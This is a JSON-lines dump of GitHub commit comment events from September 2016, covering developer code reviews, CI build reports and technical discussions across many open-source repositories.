{"id":"4590675021","type":"CommitCommentEvent","actor":{"login":"mateuspatricio"},"repo":{"name":"Ensembl/ensembl-compara"},"payload":{"comment":{"id":19098899,"position":null,"line":null,"path":null,"commit_id":"b77c020774323799cefee93735a4eda900d4e64f","created_at":"2016-09-20T16:04:25Z","updated_at":"2016-09-20T16:04:25Z","body":"Really?! Well in that case I should revert back to 4 then. I thought it was fast enough."}},"created_at":"2016-09-20T16:04:25Z"}
{"id":"4590675193","type":"CommitCommentEvent","actor":{"login":"kolosek"},"repo":{"name":"Bassonlinho/fetch"},"payload":{"comment":{"id":19098900,"position":4,"line":3,"path":"Gemfile","commit_id":"89bd34eaa08637920e5eb23f664c17d9484c58a3","created_at":"2016-09-20T16:04:27Z","updated_at":"2016-09-20T16:04:27Z","body":"Da li je neophodno bilo upgrade-ovati verziju Ruby-ja?"}},"created_at":"2016-09-20T16:04:27Z"}
{"id":"4590675666","type":"CommitCommentEvent","actor":{"login":"AdamSupinski"},"repo":{"name":"AdamSupinski/WDTProject"},"payload":{"comment":{"id":19098903,"position":30,"line":290,"path":"src/main/java/asupinski/MainApp.java","commit_id":"be18499afa4428e990d87766d955788c55a5d0d1","created_at":"2016-09-20T16:04:31Z","updated_at":"2016-09-20T16:04:31Z","body":"Skąd powyższe TODO i próba castowania nulla na Stringa?"}},"created_at":"2016-09-20T16:04:31Z"}
{"id":"4590681569","type":"CommitCommentEvent","actor":{"login":"AdamSupinski"},"repo":{"name":"AdamSupinski/WDTProject"},"payload":{"comment":{"id":19098914,"position":26,"line":533,"path":"src/main/java/asupinski/controller/BasicDataOverviewController.java","commit_id":"92d06f62cb5bc4b33ca1acfdd08402f4869c77ea","created_at":"2016-09-20T16:05:13Z","updated_at":"2016-09-20T16:05:13Z","body":"Dlaczego tekst ustawiany jest na null, a nie na pusty string?"}},"created_at":"2016-09-20T16:05:13Z"}
{"id":"4590682989","type":"CommitCommentEvent","actor":{"login":"AdamSupinski"},"repo":{"name":"AdamSupinski/WDTProject"},"payload":{"comment":{"id":19098918,"position":59,"line":575,"path":"src/main/java/asupinski/controller/BasicDataOverviewController.java","commit_id":"92d06f62cb5bc4b33ca1acfdd08402f4869c77ea","created_at":"2016-09-20T16:05:26Z","updated_at":"2016-09-20T16:05:26Z","body":"Ponownie - skąd null?"}},"created_at":"2016-09-20T16:05:26Z"}
{"id":"4590686343","type":"CommitCommentEvent","actor":{"login":"MasseGuillaume"},"repo":{"name":"lampepfl/dotty"},"payload":{"comment":{"id":19098923,"position":47,"line":47,"path":"bridge/src/main/scala/xsbt/CompilerClassLoader.scala","commit_id":"09b2f39731386cd5b3688d5c3badf75d956d4f6d","created_at":"2016-09-20T16:05:53Z","updated_at":"2016-09-20T16:05:53Z","body":"actually, I have a question for you. it look like the sbt compilerReporter is not forwarded to dotty, correct ?"}},"created_at":"2016-09-20T16:05:53Z"}
{"id":"4590689229","type":"CommitCommentEvent","actor":{"login":"WSawicka"},"repo":{"name":"AdamSupinski/WDTProject"},"payload":{"comment":{"id":19098930,"position":61,"line":609,"path":"src/main/java/asupinski/controller/BasicDataOverviewController.java","commit_id":"be18499afa4428e990d87766d955788c55a5d0d1","created_at":"2016-09-20T16:06:18Z","updated_at":"2016-09-20T16:06:18Z","body":"Te przyciski zostały przeniesione do paska menu, zatem nie istnieją w tym oknie."}},"created_at":"2016-09-20T16:06:18Z"}
{"id":"4590690778","type":"CommitCommentEvent","actor":{"login":"mjhoy"},"repo":{"name":"mjhoy/dotfiles"},"payload":{"comment":{"id":19098937,"position":null,"line":null,"path":null,"commit_id":"183a52c74ebbfe66f45f88f1c5a9a27482f7120d","created_at":"2016-09-20T16:06:31Z","updated_at":"2016-09-20T16:06:31Z","body":"introduced in https://github.com/mjhoy/dotfiles/commit/1791b177aaa3800f8d748ddc153bade9b7ec4e0b"}},"created_at":"2016-09-20T16:06:31Z"}
{"id":"4590691929","type":"CommitCommentEvent","actor":{"login":"lucaswerkmeister"},"repo":{"name":"ceylon/ceylon"},"payload":{"comment":{"id":19098939,"position":null,"line":null,"path":null,"commit_id":"ffb734cdaa1e3bff0f56b5be8a1b3d3311cb22e1","created_at":"2016-09-20T16:06:41Z","updated_at":"2016-09-20T16:06:41Z","body":"…is the inconsistent puncutation here (dot after JVM but not NodeJS) a deliberate joke? :P\r\n\r\nAlso, this doesn’t document the “unknown runtime” case. Perhaps it would be better to explicitly specify that any other value is reserved (e. g. for Dart)."}},"created_at":"2016-09-20T16:06:41Z"}
{"id":"4590696600","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19098947,"position":null,"line":null,"path":null,"commit_id":"3751dba760193dd02904bdbb0f5fa5c70498d49a","created_at":"2016-09-20T16:07:24Z","updated_at":"2016-09-20T16:07:24Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1076](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13682&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 242, ignored: 3 Build time: 00:09:27"}},"created_at":"2016-09-20T16:07:24Z"}
{"id":"4590696799","type":"CommitCommentEvent","actor":{"login":"CounterPillow"},"repo":{"name":"overviewer/Minecraft-Overviewer"},"payload":{"comment":{"id":19098948,"position":null,"line":null,"path":null,"commit_id":"5862b34e9eccb6adac93684ee7647eae298e2621","created_at":"2016-09-20T16:07:26Z","updated_at":"2016-09-20T16:07:26Z","body":"@monkeyworknet \r\nbut it does?"}},"created_at":"2016-09-20T16:07:26Z"}
{"id":"4590700135","type":"CommitCommentEvent","actor":{"login":"rascarlo"},"repo":{"name":"TilesLocalization/resources"},"payload":{"comment":{"id":19098955,"position":null,"line":null,"path":null,"commit_id":"cb3f59c4ed6376e6ae9b1867a2579b25366c4fd3","created_at":"2016-09-20T16:07:58Z","updated_at":"2016-09-20T16:07:58Z","body":"eheh... I think I am done with AOSP. Lol I even built N just for the fun, but I think I am done. I think..."}},"created_at":"2016-09-20T16:07:58Z"}
{"id":"4590703217","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19098963,"position":null,"line":null,"path":null,"commit_id":"ec5abb3ced73d0a1ee5d2d0d9ea67b092e3cf004","created_at":"2016-09-20T16:08:27Z","updated_at":"2016-09-20T16:08:27Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (mjwitte) - x86_64-MacOS-10.9-clang: OK (2333 of 2334 tests passed, 0 test warnings)\n\n * 1 test had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: RDD diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ec5abb3ced73d0a1ee5d2d0d9ea67b092e3cf004-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ec5abb3ced73d0a1ee5d2d0d9ea67b092e3cf004-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-20T16:08:27Z"}
{"id":"4590703766","type":"CommitCommentEvent","actor":{"login":"davidgfnet"},"repo":{"name":"X-Ryl669/wifi_display"},"payload":{"comment":{"id":19098966,"position":null,"line":null,"path":null,"commit_id":"0dc18c913191e6037ba3ededcd39074a95d04284","created_at":"2016-09-20T16:08:32Z","updated_at":"2016-09-20T16:08:32Z","body":"Oh I see, so you do NOT have a power gating transistor, and therefore the headache, right? In my case, since I have a pull down resistor it all works well."}},"created_at":"2016-09-20T16:08:32Z"}
{"id":"4590703795","type":"CommitCommentEvent","actor":{"login":"Slayer95"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19098965,"position":null,"line":null,"path":null,"commit_id":"270db5d1c0e116b95de38e2a2c53564399417b40","created_at":"2016-09-20T16:08:32Z","updated_at":"2016-09-20T16:08:32Z","body":"@ZoroarkShade , esta es una actualización crítica de seguridad (mencionada en las noticias http://pokemonshowdown.com/news/5809), y afecta precisamente al login y sistema de autenticación.\r\n\r\nLas cuentas que listas no están registradas y no es evidente una relación de causa-efecto entre el no aplicar este parche y la presencia de los bots. No obstante, es indispensable para todo servidor estar actualizado a brevedad."}},"created_at":"2016-09-20T16:08:32Z"}
{"id":"4590704654","type":"CommitCommentEvent","actor":{"login":"SteveSandersonMS"},"repo":{"name":"aspnet/JavaScriptServices"},"payload":{"comment":{"id":19098969,"position":null,"line":null,"path":null,"commit_id":"f7ef36bc7418d3a350a0419cdb0204ca5b28b0a8","created_at":"2016-09-20T16:08:40Z","updated_at":"2016-09-20T16:08:40Z","body":"I'd say it's stable now (though we'll keep working on it and improving it). There'll be a VS version of the Angular 2 template included in the next release of the [ASP.NET Core Template Pack](https://visualstudiogallery.msdn.microsoft.com/31a3eab5-e62b-4030-9226-b5e4c9e1ffb5) (no ETA yet though)."}},"created_at":"2016-09-20T16:08:40Z"}
{"id":"4590705485","type":"CommitCommentEvent","actor":{"login":"FreakofKnuth"},"repo":{"name":"whiskeyromeo/CommunityQuestionAnswering"},"payload":{"comment":{"id":19098975,"position":128,"line":128,"path":"vomitRepo/whiskeyPrimer2.py","commit_id":"a4e48129d57cf471fd7f81be7fbcc07096055079","created_at":"2016-09-20T16:08:47Z","updated_at":"2016-09-20T16:08:47Z","body":"What is the difference between model.save(\"\") and using pickles?"}},"created_at":"2016-09-20T16:08:47Z"}
{"id":"4590707824","type":"CommitCommentEvent","actor":{"login":"rascarlo"},"repo":{"name":"TilesLocalization/resources"},"payload":{"comment":{"id":19098978,"position":null,"line":null,"path":null,"commit_id":"f9278d602eacdeec64801f4538c44bc900825b5b","created_at":"2016-09-20T16:09:08Z","updated_at":"2016-09-20T16:09:08Z","body":"@rodrigoswz thank you. also for taking the time and improve other strings. appreciated"}},"created_at":"2016-09-20T16:09:08Z"}
{"id":"4590708907","type":"CommitCommentEvent","actor":{"login":"kvakvs"},"repo":{"name":"garazdawi/otp"},"payload":{"comment":{"id":19098981,"position":10,"line":16,"path":"erts/emulator/beam/erl_gc_sweep.h","commit_id":"16da8c2bc1fb83c5c2158938681af0bf291f9d64","created_at":"2016-09-20T16:09:18Z","updated_at":"2016-09-20T16:09:18Z","body":"This was intended to extend erl_gc, and not become a global library. If one includes this header from anywhere without defining ERL_WANT_GCSWEEP_INTERNALS__ 1 they will get empty header, nothing"}},"created_at":"2016-09-20T16:09:18Z"}
{"id":"4590712513","type":"CommitCommentEvent","actor":{"login":"WSawicka"},"repo":{"name":"AdamSupinski/WDTProject"},"payload":{"comment":{"id":19098993,"position":59,"line":575,"path":"src/main/java/asupinski/controller/BasicDataOverviewController.java","commit_id":"92d06f62cb5bc4b33ca1acfdd08402f4869c77ea","created_at":"2016-09-20T16:09:51Z","updated_at":"2016-09-20T16:09:51Z","body":"W tym miejscu należało usunąć pozostałości z wartości usuniętego auta. Skąd null? zasugerowałam się podobnymi, powyżej napisanymi funkcjami z aktualnego controllera."}},"created_at":"2016-09-20T16:09:51Z"}
{"id":"4590713166","type":"CommitCommentEvent","actor":{"login":"davidgfnet"},"repo":{"name":"X-Ryl669/wifi_display"},"payload":{"comment":{"id":19098998,"position":null,"line":null,"path":null,"commit_id":"0dc18c913191e6037ba3ededcd39074a95d04284","created_at":"2016-09-20T16:09:58Z","updated_at":"2016-09-20T16:09:58Z","body":"Oh and I havent seen the issue with the deep sleep myself. I'll check that out. I wanted to stick an ampmeter into the power line and see what it is going on, but my ampmeter makes the ESP reboot randomly, I have no idea how it is implemented internally :("}},"created_at":"2016-09-20T16:09:58Z"}
{"id":"4590721303","type":"CommitCommentEvent","actor":{"login":"leifwickland"},"repo":{"name":"melrief/pureconfig"},"payload":{"comment":{"id":19099027,"position":null,"line":null,"path":null,"commit_id":"42ac2de3823496e1526927a82abd074900d72e56","created_at":"2016-09-20T16:11:13Z","updated_at":"2016-09-20T16:11:13Z","body":"I wholeheartedly approve.\r\n"}},"created_at":"2016-09-20T16:11:13Z"}
{"id":"4590723669","type":"CommitCommentEvent","actor":{"login":"davidgfnet"},"repo":{"name":"X-Ryl669/wifi_display"},"payload":{"comment":{"id":19099033,"position":null,"line":null,"path":null,"commit_id":"81b738f4ec9bc7abaeec10e25fb82b4721d19087","created_at":"2016-09-20T16:11:36Z","updated_at":"2016-09-20T16:11:36Z","body":"Interesting... the SPI works reliably for me, even at high freqs (like 1MHz or so?), never experienced that, not even in low-bat conditions. It reliably transfers the image, although it partially fails at render, the screen takes a huge power peak to refresh itself."}},"created_at":"2016-09-20T16:11:36Z"}
{"id":"4590729800","type":"CommitCommentEvent","actor":{"login":"AdamSupinski"},"repo":{"name":"AdamSupinski/WDTProject"},"payload":{"comment":{"id":19099049,"position":61,"line":609,"path":"src/main/java/asupinski/controller/BasicDataOverviewController.java","commit_id":"be18499afa4428e990d87766d955788c55a5d0d1","created_at":"2016-09-20T16:12:38Z","updated_at":"2016-09-20T16:12:38Z","body":"Ok, racja. :)"}},"created_at":"2016-09-20T16:12:38Z"}
{"id":"4590733159","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":19099057,"position":null,"line":null,"path":null,"commit_id":"ace137c3663a3a16f79e3504497031d94afa209f","created_at":"2016-09-20T16:13:10Z","updated_at":"2016-09-20T16:13:10Z","body":"\nBuild report #161372952 for sha ace137c3663a3a16f79e3504497031d94afa209f:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%280/0%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-0.00%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-0%20error%28s%29-brightgreen.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-0%20/%200%20%280.00%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-0.00%20%25-yellow.svg)](#)\n\n\n[Reports](https://psycofdj.github.io/xtdcpp/feature/unitests/)\n      "}},"created_at":"2016-09-20T16:13:10Z"}
{"id":"4590735175","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":19099064,"position":null,"line":null,"path":null,"commit_id":"ace137c3663a3a16f79e3504497031d94afa209f","created_at":"2016-09-20T16:13:29Z","updated_at":"2016-09-20T16:13:29Z","body":"\nBuild report #161372964 for sha ace137c3663a3a16f79e3504497031d94afa209f:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%280/0%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-0.00%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-0%20error%28s%29-brightgreen.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-0%20/%200%20%280.00%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-0.00%20%25-yellow.svg)](#)\n\n\n[Reports](https://psycofdj.github.io/xtdcpp/master/)\n      "}},"created_at":"2016-09-20T16:13:29Z"}
{"id":"4590737327","type":"CommitCommentEvent","actor":{"login":"AdamSupinski"},"repo":{"name":"AdamSupinski/WDTProject"},"payload":{"comment":{"id":19099075,"position":59,"line":575,"path":"src/main/java/asupinski/controller/BasicDataOverviewController.java","commit_id":"92d06f62cb5bc4b33ca1acfdd08402f4869c77ea","created_at":"2016-09-20T16:13:51Z","updated_at":"2016-09-20T16:13:51Z","body":"Ok. Na wszelki wypadek, zastąpiłbym pustym Stringiem :)"}},"created_at":"2016-09-20T16:13:51Z"}
{"id":"4590737569","type":"CommitCommentEvent","actor":{"login":"smarter"},"repo":{"name":"lampepfl/dotty"},"payload":{"comment":{"id":19099077,"position":47,"line":47,"path":"bridge/src/main/scala/xsbt/CompilerClassLoader.scala","commit_id":"09b2f39731386cd5b3688d5c3badf75d956d4f6d","created_at":"2016-09-20T16:13:54Z","updated_at":"2016-09-20T16:13:54Z","body":"Correct, something like [`DelegatingReporter.scala`](https://github.com/sbt/sbt/blob/0.13/compile/interface/src/main/scala/xsbt/DelegatingReporter.scala) in the scalac bridge has not been implemented for Dotty. Also, I think it would be more convenient to continue this discussion on dotty's gitter: https://gitter.im/lampepfl/dotty"}},"created_at":"2016-09-20T16:13:54Z"}
{"id":"4590738733","type":"CommitCommentEvent","actor":{"login":"ttimasdf"},"repo":{"name":"ttimasdf/nethunter_kernel_oneplus_msm8996"},"payload":{"comment":{"id":19099079,"position":null,"line":null,"path":null,"commit_id":"a2750371d964223bff64e87f8748164f7341b185","created_at":"2016-09-20T16:14:06Z","updated_at":"2016-09-20T16:14:06Z","body":"More words: \r\n\r\nthe previous commit cannot generate a valid (bootable) kernel. Although the compilation is succeeded, it freeze upon boot at the first screen (the same in the fastboot mode). This commit copyied the original Cyanogenmod config by CM developers as the base config, as well as applied the injection patch (in previous commit) and will use `make menuconfig` for upcoming enhancements, step by step. generated `.config` will be copied to `kali_oneplus3_defconfig` and commited."}},"created_at":"2016-09-20T16:14:06Z"}
{"id":"4590740654","type":"CommitCommentEvent","actor":{"login":"Dominator56"},"repo":{"name":"etlegacy/etlegacy"},"payload":{"comment":{"id":19099082,"position":6,"line":1827,"path":"src/game/bg_pmove.c","commit_id":"4f7d0647f0f0a3a793752bd6fc43472bdaf7a28d","created_at":"2016-09-20T16:14:25Z","updated_at":"2016-09-20T16:14:25Z","body":"Missing one tab :P"}},"created_at":"2016-09-20T16:14:25Z"}
{"id":"4590741807","type":"CommitCommentEvent","actor":{"login":"nouiz"},"repo":{"name":"Theano/Theano"},"payload":{"comment":{"id":19099086,"position":5,"line":29,"path":"doc/install.txt","commit_id":"547e5bb9dc2e2c6372d6ec4de2e9cfe2ed06725c","created_at":"2016-09-20T16:14:36Z","updated_at":"2016-09-20T16:14:36Z","body":"python-dev is needed on all platform."}},"created_at":"2016-09-20T16:14:36Z"}
{"id":"4590746057","type":"CommitCommentEvent","actor":{"login":"iffykhan"},"repo":{"name":"iffykhan/New"},"payload":{"comment":{"id":19099100,"position":null,"line":null,"path":null,"commit_id":"a378dc8dcbdf870e87db6d2aaa95cc80aca2e70e","created_at":"2016-09-20T16:15:18Z","updated_at":"2016-09-20T16:15:18Z","body":"new commit"}},"created_at":"2016-09-20T16:15:18Z"}
{"id":"4590746456","type":"CommitCommentEvent","actor":{"login":"WSawicka"},"repo":{"name":"AdamSupinski/WDTProject"},"payload":{"comment":{"id":19099101,"position":30,"line":290,"path":"src/main/java/asupinski/MainApp.java","commit_id":"be18499afa4428e990d87766d955788c55a5d0d1","created_at":"2016-09-20T16:15:22Z","updated_at":"2016-09-20T16:15:22Z","body":"W aktualnej wersji TODO jest usunięte. \r\nAplikacja rzucała errorem, gdyż ta metoda przyjmuje różne parametry: (File, Charset) oraz (File, String). Konieczne było zdecydowanie się na którąś z opcji"}},"created_at":"2016-09-20T16:15:22Z"}
{"id":"4590750373","type":"CommitCommentEvent","actor":{"login":"ttimasdf"},"repo":{"name":"ttimasdf/nethunter_kernel_oneplus_msm8996"},"payload":{"comment":{"id":19099112,"position":null,"line":null,"path":null,"commit_id":"a2750371d964223bff64e87f8748164f7341b185","created_at":"2016-09-20T16:16:00Z","updated_at":"2016-09-20T16:16:00Z","body":"The bluetooth usb module doesn't work as well (compile error). Will get inside afterwards."}},"created_at":"2016-09-20T16:16:00Z"}
{"id":"4590752429","type":"CommitCommentEvent","actor":{"login":"pvalsecc"},"repo":{"name":"pvalsecc/QGIS"},"payload":{"comment":{"id":19099116,"position":63,"line":3646,"path":"src/core/qgsexpression.cpp","commit_id":"c3be0d826c3ac39d9b7dfcf6c91537559a46f1f1","created_at":"2016-09-20T16:16:21Z","updated_at":"2016-09-20T16:16:21Z","body":"What aliases? Where do I get them?"}},"created_at":"2016-09-20T16:16:21Z"}
{"id":"4590754521","type":"CommitCommentEvent","actor":{"login":"basnijholt"},"repo":{"name":"basnijholt/hpc05"},"payload":{"comment":{"id":19099122,"position":null,"line":null,"path":null,"commit_id":"4e433935261e1d54fc71de9fa74f4552b5c224ac","created_at":"2016-09-20T16:16:41Z","updated_at":"2016-09-20T16:16:41Z","body":"It just added the `engine-culler.py`"}},"created_at":"2016-09-20T16:16:41Z"}
{"id":"4590756334","type":"CommitCommentEvent","actor":{"login":"iphone4peru"},"repo":{"name":"iphone4peru/ejercicios_videos_youtube"},"payload":{"comment":{"id":19099132,"position":null,"line":null,"path":null,"commit_id":"109b1f6bff43540d377f918b0aea53b886546b50","created_at":"2016-09-20T16:17:00Z","updated_at":"2016-09-20T16:17:00Z","body":"Ejemplo tutor sobre UIApplication y metodo SharedApplication en Swift"}},"created_at":"2016-09-20T16:17:00Z"}
{"id":"4590759033","type":"CommitCommentEvent","actor":{"login":"encelo"},"repo":{"name":"glfw/glfw"},"payload":{"comment":{"id":19099137,"position":null,"line":null,"path":null,"commit_id":"5964f74e3aa36e7284e351d3b3d091a6d454d363","created_at":"2016-09-20T16:17:26Z","updated_at":"2016-09-20T16:17:26Z","body":"This commit might be the cause for GLFW not being able to create the window under a virtualized OS X.\r\n\r\nWhat are the conditions you are mentioning that could lead to the software renderer being preferred on a native system?\r\nThe [documentation](https://developer.apple.com/reference/appkit/1436213-anonymous/nsopenglpfaaccelerated) on Apple site says that accelerated renderers are still preferred when the attribute is not present."}},"created_at":"2016-09-20T16:17:26Z"}
{"id":"4590759348","type":"CommitCommentEvent","actor":{"login":"slefrancois"},"repo":{"name":"Theano/Theano"},"payload":{"comment":{"id":19099138,"position":5,"line":29,"path":"doc/install.txt","commit_id":"547e5bb9dc2e2c6372d6ec4de2e9cfe2ed06725c","created_at":"2016-09-20T16:17:29Z","updated_at":"2016-09-20T16:17:29Z","body":"pushed the correction"}},"created_at":"2016-09-20T16:17:29Z"}
{"id":"4590762760","type":"CommitCommentEvent","actor":{"login":"muffato"},"repo":{"name":"Ensembl/ensembl-compara"},"payload":{"comment":{"id":19099152,"position":5,"line":118,"path":"modules/Bio/EnsEMBL/Compara/PipeConfig/Parts/CAFE.pm","commit_id":"9b88fe4c850d99b677aa44804416ee4e1d558be2","created_at":"2016-09-20T16:18:04Z","updated_at":"2016-09-20T16:18:04Z","body":"Oh, 2Gb ! That's more than usual, interesting. The species-set is in fact smaller than vertebrates. Let's say 4Gb, then ?"}},"created_at":"2016-09-20T16:18:04Z"}
{"id":"4590763960","type":"CommitCommentEvent","actor":{"login":"tombentley"},"repo":{"name":"ceylon/ceylon"},"payload":{"comment":{"id":19099158,"position":null,"line":null,"path":null,"commit_id":"ffb734cdaa1e3bff0f56b5be8a1b3d3311cb22e1","created_at":"2016-09-20T16:18:16Z","updated_at":"2016-09-20T16:18:16Z","body":"Never ascribe to jest that which can be explained by sheer incompetence.\r\n\r\nI didn't document the Unknown runtime case because I thought things looked inconsistent enough already. I just couldn't bear to set in stone a name with spaces in addition to the existing inconsistencies.\r\n\r\nPersonally I think it's OK for there to be possible values outside those documented ones."}},"created_at":"2016-09-20T16:18:16Z"}
{"id":"4590765489","type":"CommitCommentEvent","actor":{"login":"pattacini"},"repo":{"name":"robotology/icub-main"},"payload":{"comment":{"id":19099162,"position":null,"line":null,"path":null,"commit_id":"32964d1c9ef4b06c4dd29de13458643cee2b947a","created_at":"2016-09-20T16:18:31Z","updated_at":"2016-09-20T16:18:31Z","body":"@mbrunettini FYI\r\n\r\nWe've just tested the cluster stuff on `R1` and the outcome is that `-X` option on `r1-face` is unfortunately still required."}},"created_at":"2016-09-20T16:18:31Z"}
{"id":"4590766653","type":"CommitCommentEvent","actor":{"login":"webhaikal"},"repo":{"name":"Ferrari-Dev-Team/android_kernel_xiaomi_ferrari"},"payload":{"comment":{"id":19099166,"position":null,"line":null,"path":null,"commit_id":"f5b7d47c2824e918b85a3bbb29a46bb340bcb607","created_at":"2016-09-20T16:18:42Z","updated_at":"2016-09-20T16:18:42Z","body":"Could you explain more this commit?"}},"created_at":"2016-09-20T16:18:42Z"}
{"id":"4590767183","type":"CommitCommentEvent","actor":{"login":"kvakvs"},"repo":{"name":"garazdawi/otp"},"payload":{"comment":{"id":19099169,"position":87,"line":137,"path":"erts/emulator/beam/erl_gc_sweep.h","commit_id":"16da8c2bc1fb83c5c2158938681af0bf291f9d64","created_at":"2016-09-20T16:18:48Z","updated_at":"2016-09-20T16:18:48Z","body":"This is to attract attention. These will be uncommented after refactor is finished and new oldheap algorithm is added. Wasn't going to deliver it like this :)"}},"created_at":"2016-09-20T16:18:48Z"}
{"id":"4590775856","type":"CommitCommentEvent","actor":{"login":"pookamat"},"repo":{"name":"deepaCodes/DPS-04"},"payload":{"comment":{"id":19099200,"position":null,"line":null,"path":null,"commit_id":"3d62cebb5d6e1c85716c59001d10d5298646d105","created_at":"2016-09-20T16:20:13Z","updated_at":"2016-09-20T16:20:13Z","body":"The sprint report"}},"created_at":"2016-09-20T16:20:13Z"}
{"id":"4590781142","type":"CommitCommentEvent","actor":{"login":"pvalsecc"},"repo":{"name":"pvalsecc/QGIS"},"payload":{"comment":{"id":19099210,"position":63,"line":3646,"path":"src/core/qgsexpression.cpp","commit_id":"c3be0d826c3ac39d9b7dfcf6c91537559a46f1f1","created_at":"2016-09-20T16:21:04Z","updated_at":"2016-09-20T16:21:04Z","body":"OK, foget my stupid question. I've found them. Fixed."}},"created_at":"2016-09-20T16:21:04Z"}
{"id":"4590781512","type":"CommitCommentEvent","actor":{"login":"MigFerreira"},"repo":{"name":"MigFerreira/nodeeditor"},"payload":{"comment":{"id":19099211,"position":9,"line":65,"path":"src/FlowScene.cpp","commit_id":"9ebda26996a5a9a0b98f7b20abc06b58706df80b","created_at":"2016-09-20T16:21:08Z","updated_at":"2016-09-20T16:21:08Z","body":"Thanks for the explanation. \nweak/shared pointers are new to me. \n\nNot to be troublesome but if you find any additional errors or bad practices don't hesitate to point them out.\n\nRegards,\nMiguel\n\n\nSent from Mailbird [http://www.getmailbird.com/?utm_source=Mailbird&amp;utm_medium=email&amp;utm_campaign=sent-from-mailbird]\nOn 20/09/2016 16:58:03, paceholder <notifications@github.com> wrote:\nJust for your information.\nThis is a tricky C++ thing. The function lock() returns a temporary object std::shared<Node>.\nYou can copy it to a local variable\nstd::shared_ptr<Node> node = ngo->node().lock();\nIn this case the inner counter in node gets increment and everything works fine.\nTemporary object is destroyed (with decrementing the counter).\nAlternatively, you can bind it to const reference\nstd::shared_ptr<Node> const & node = ngo->node().lock();\nC++ guarantees that temporary object bound to the const ref will exist till the const ref goes out of scope.\nHowever binding a temporary object to the non-const reference is an error:\nstd::shared_ptr<Node>& node = ngo->node().lock();\nAfter the temporary object is bound to the reference it is destroyed. Reference remains in an undefined state. It references a destroyed object.\nSee also: http://stackoverflow.com/questions/11560339/returning-temporary-object-and-binding-to-const-reference [http://stackoverflow.com/questions/11560339/returning-temporary-object-and-binding-to-const-reference]\nI will check a bit later why the code throws a segmentation fault.\n—\nYou are receiving this because you are subscribed to this thread.\nReply to this email directly, view it on GitHub [https://github.com/MigFerreira/nodeeditor/commit/9ebda26996a5a9a0b98f7b20abc06b58706df80b#commitcomment-19098765], or mute the thread [https://github.com/notifications/unsubscribe-auth/AAdn-PrBz9kGSZ4g066ALNyf1tV10fpPks5qsAKGgaJpZM4KBzmP]."}},"created_at":"2016-09-20T16:21:08Z"}
{"id":"4590781842","type":"CommitCommentEvent","actor":{"login":"RafalSkolasinski"},"repo":{"name":"basnijholt/hpc05"},"payload":{"comment":{"id":19099214,"position":7,"line":6,"path":"setup.py","commit_id":"4e433935261e1d54fc71de9fa74f4552b5c224ac","created_at":"2016-09-20T16:21:11Z","updated_at":"2016-09-20T16:21:11Z","body":"that url seems wrong\r\n"}},"created_at":"2016-09-20T16:21:11Z"}
{"id":"4590782522","type":"CommitCommentEvent","actor":{"login":"RafalSkolasinski"},"repo":{"name":"basnijholt/hpc05"},"payload":{"comment":{"id":19099216,"position":null,"line":null,"path":null,"commit_id":"4e433935261e1d54fc71de9fa74f4552b5c224ac","created_at":"2016-09-20T16:21:18Z","updated_at":"2016-09-20T16:21:18Z","body":"Thanks!"}},"created_at":"2016-09-20T16:21:18Z"}
{"id":"4590782918","type":"CommitCommentEvent","actor":{"login":"elcomjc"},"repo":{"name":"angular-ui-tree/angular-ui-tree"},"payload":{"comment":{"id":19099218,"position":null,"line":null,"path":null,"commit_id":"c19c05d8f1bfd1fa992658d3d401ed86643d8911","created_at":"2016-09-20T16:21:22Z","updated_at":"2016-09-20T16:21:22Z","body":"Hellou, \r\n\r\nI think that something was wrong with the last commit, because im not getting reordering when drag elements.\r\n\r\nPlease verify that"}},"created_at":"2016-09-20T16:21:22Z"}
{"id":"4590784088","type":"CommitCommentEvent","actor":{"login":"kvakvs"},"repo":{"name":"garazdawi/otp"},"payload":{"comment":{"id":19099221,"position":103,"line":245,"path":"erts/emulator/beam/erl_gc_sweep.h","commit_id":"16da8c2bc1fb83c5c2158938681af0bf291f9d64","created_at":"2016-09-20T16:21:33Z","updated_at":"2016-09-20T16:21:33Z","body":"const char * = mutable pointer to immutable char - this one is to minimize side effects\r\nchar * const = immutable pointer to mutable char - this one is rare\r\nconst on value copied args is just for better discipline in the function - no matter const or not - this one is not going to create any side effects as it is a copy anyway"}},"created_at":"2016-09-20T16:21:33Z"}
